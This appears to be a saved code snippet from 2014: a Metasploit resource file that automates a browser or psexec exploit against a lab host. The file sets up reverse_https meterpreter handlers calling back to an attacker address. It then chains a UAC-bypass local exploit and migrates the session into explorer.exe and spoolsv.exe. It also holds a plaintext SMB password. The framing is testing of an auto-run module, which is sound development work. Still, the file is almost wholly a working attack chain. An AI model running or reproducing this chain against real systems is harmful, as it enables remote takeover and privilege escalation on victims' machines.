first attempt at resource file for automating testing of auto_run_local_exploits

5/7/2014 - 7:26 PM

first attempt at resource file for automating testing of auto_run_local_exploits

# 0) setup our variables
<% rc_primary_lhost = "192.168.130.1" %>
<% rc_lhost_for_local = rc_primary_lhost %>

<% rc_primary_lport = "4433" %>
<% rc_lport_for_local = "4443" %>

## primary exploit options
#<% rc_primary_exploit = "exploit/windows/smb/psexec" %> #>
<% rc_primary_exploit = "exploit/windows/browser/ms14_012_textrange" %>
<% if rc_primary_exploit =~ /\/browser\// %>
  # browser exploit
  <% rc_primary_exploit_options = [["LHOST", rc_primary_lhost], ["RHOST", "192.168.130.166"], ["LPORT", rc_primary_lport]] %> #>
<% elsif rc_primary_exploit =~ /\/psexec/ %>
  # psexec exploit
  #<% rc_primary_exploit_options = [["LHOST", rc_primary_lhost], ["RHOST", "192.168.130.166"], ["LPORT", rc_primary_lport], ["SMBDomain", '.'], ["SMBUser", "ZDI"], ["SMBPass", 'ZDIgr0ver!']] %> #>
<% else %>
  # other exploit
  <% rc_primary_exploit_options = [["LHOST", rc_primary_lhost], ["RHOST", "192.168.130.166"], ["LPORT", rc_primary_lport]] %> #>
<% end %>

# ["SRVHOST", rc_primary_lhost]
<% rc_exploit_for_local = "exploit/windows/local/bypassuac_injection" %>

<% rc_primary_payload = "windows/meterpreter/reverse_https" %>
<% rc_payload_for_local = rc_primary_payload %>

<% rc_primary_initial_script = "migrate -n explorer.exe" %>
<% rc_disable_handler_for_local = "false" %>
<% rc_primary_auto_run_script = "#{rc_exploit_for_local} LPORT=#{rc_lport_for_local} DisablePayloadHandler=rc_disable_handler_for_local" %>
<% rc_auto_run_script_for_local = "migrate -n spoolsv.exe" %>
 
# 1) prep for primary exploit
set VERBOSE true
## handler
use exploit/multi/handler
set PAYLOAD <%= rc_primary_payload %>
set LHOST <%= rc_primary_lhost %>
set LPORT <%= rc_primary_lport %>
set ExitOnSession false
set InitialAutoRunScript <%= rc_primary_initial_script %>
set AutoRunScript <%= rc_primary_auto_run_script %>
exploit -j -z
 
# 2) prep for secondary exploit
set AutoRunScript <%= rc_auto_run_script_for_local %>
unset InitialAutoRunScript
## setup secondary handler for local exploit if DisablePayloadHandler
<% if rc_disable_handler_for_local.downcase == "true" %>
  set PAYLOAD <%= rc_payload_for_local %>
  set LPORT <%= rc_lport_for_local %>
  #exploit -j -z
<% end %>
 
# 3) run primary exploit to get an initial session
use <%= rc_primary_exploit %>
set PAYLOAD <%= rc_primary_payload %>
<% rc_primary_exploit_options.each do |opt_arr| %>
  set <%= opt_arr.join(' ') %>
<% end %>

# always DisablePayloadHandler for the primary (for testing at least)
set DisablePayloadHandler true
#exploit -j -z

Cacher is the code snippet organizer for pro developers

We empower you and your team to get more done, faster

first attempt at resource file for automating testing of auto_run_local_exploits